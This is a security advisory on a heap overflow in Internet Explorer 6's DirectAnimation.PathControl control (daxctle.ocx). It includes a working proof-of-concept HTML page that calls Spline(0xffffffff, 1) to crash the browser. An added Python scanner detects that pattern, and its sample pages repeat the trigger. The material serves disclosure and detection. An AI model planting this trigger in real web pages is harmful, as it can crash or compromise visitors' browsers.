Microsoft Internet Explorer daxctle.ocx Heap Overflow

Summary

Microsoft Internet Explorer is vulnerable to a heap overflow attack when it handles a DirectAnimation.PathControl COM object.

Credit:

The information has been provided by nop.
The original article can be found at:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19


Details

Vulnerable Systems:
 * Windows 2000/XP/2003 Internet Explorer 6.0 SP1

When Internet Explorer handles the Spline method of a DirectAnimation.PathControl COM object (daxctle.ocx), setting the first parameter to 0xffffffff triggers an invalid memory write. An attacker may use this to cause a denial of service and could possibly execute arbitrary code.

Exploit:
<!--
// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:\WINNT\system32\daxctle.ocx

-->
<html>
<head>
<title>test</title>
</head>
<body>
<script>

var target = new ActiveXObject('DirectAnimation.PathControl');

target.Spline(0xffffffff, 1);

</script>
</body>
</html>
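
A static check for page content that references this control, built from the ProgID, CLSID and Spline argument given in the PoC above. This is an added example, not part of the original advisory; the function name, finding labels and sample pages are constructed for illustration.

```python
import re

# Identifiers copied from the PoC header in the advisory.
PROGID = "DirectAnimation.PathControl"
CLSID = "D7A7D7C3-D47F-11D0-89D3-00A0C90833E6"

QUOTE = "[\"'\u2018\u2019]"  # straight or typographic quotes
RE_PROGID = re.compile(r"ActiveXObject\s*\(\s*" + QUOTE + re.escape(PROGID) + QUOTE, re.I)
RE_CLSID = re.compile(r"clsid:\s*\{?" + re.escape(CLSID) + r"\}?", re.I)
# Numeric literal passed as the first argument of a .Spline(...) call.
RE_SPLINE = re.compile(r"\.Spline\s*\(\s*(0x[0-9a-f]+|\d+)\s*,", re.I)


def _literal(tok):
    """Parse a hex or decimal integer literal as written in script source."""
    return int(tok, 16) if tok.lower().startswith("0x") else int(tok, 10)


def scan(html):
    """Return sorted finding labels (hypothetical names) for one page."""
    findings = set()
    if RE_PROGID.search(html):
        findings.add("progid-instantiation")
    if RE_CLSID.search(html):
        findings.add("clsid-object-tag")
    # Only look at Spline calls when the control is referenced at all.
    if findings and any(_literal(m.group(1)) == 0xFFFFFFFF
                        for m in RE_SPLINE.finditer(html)):
        findings.add("spline-first-arg-0xffffffff")
    return sorted(findings)


# Constructed sample inputs (not captured traffic).
SCRIPT_PAGE = ("<script>var t = new ActiveXObject('DirectAnimation.PathControl');"
               "t.Spline(0xffffffff, 1);</script>")
OBJECT_PAGE = ('<object id="p" classid="clsid:d7a7d7c3-d47f-11d0-89d3-00a0c90833e6">'
               "</object>")
BENIGN_PAGE = "<script>chart.Spline(3, 1);</script>"

if __name__ == "__main__":
    for name, page in [("script", SCRIPT_PAGE), ("object", OBJECT_PAGE),
                       ("benign", BENIGN_PAGE)]:
        print(name, scan(page))
```

The check matches literal source text only, so script that builds the ProgID or the argument at run time will not be flagged.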
